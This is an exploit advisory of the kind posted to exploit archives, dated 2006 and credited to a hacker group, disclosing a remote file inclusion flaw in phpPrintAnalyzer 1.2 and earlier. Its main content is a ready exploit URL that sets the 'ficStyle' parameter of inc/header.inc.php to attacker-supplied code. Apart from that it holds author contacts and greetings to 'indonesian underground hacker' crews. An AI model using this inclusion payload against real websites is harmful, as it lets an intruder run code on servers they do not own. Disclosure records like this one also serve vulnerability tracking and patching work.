id: 679
date: 08/09/2006
title: phpPrintAnalyzer <= 1.2 Remote File Include Vulnerability
author: Cmaster4
cves: 

=========================================================
phpPrintAnalyzer <= 1.2 Remote File Include Vulnerability
=========================================================



#title: phpPrintAnalyzer Inclusion Vulnerability
 
#Author: Cmaster4 #batamhacker irc.dal.net
 
#script: phpPrintAnalyzer
 
#Class : Remote
 
#cont@ct: gaul@enet.com.cn
 
#Exploit:
http://site.com/[path]/inc/header.inc.php?ficStyle=[evilcode]

Thx to :
#batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker



#  0day.today [2023-03-25]  #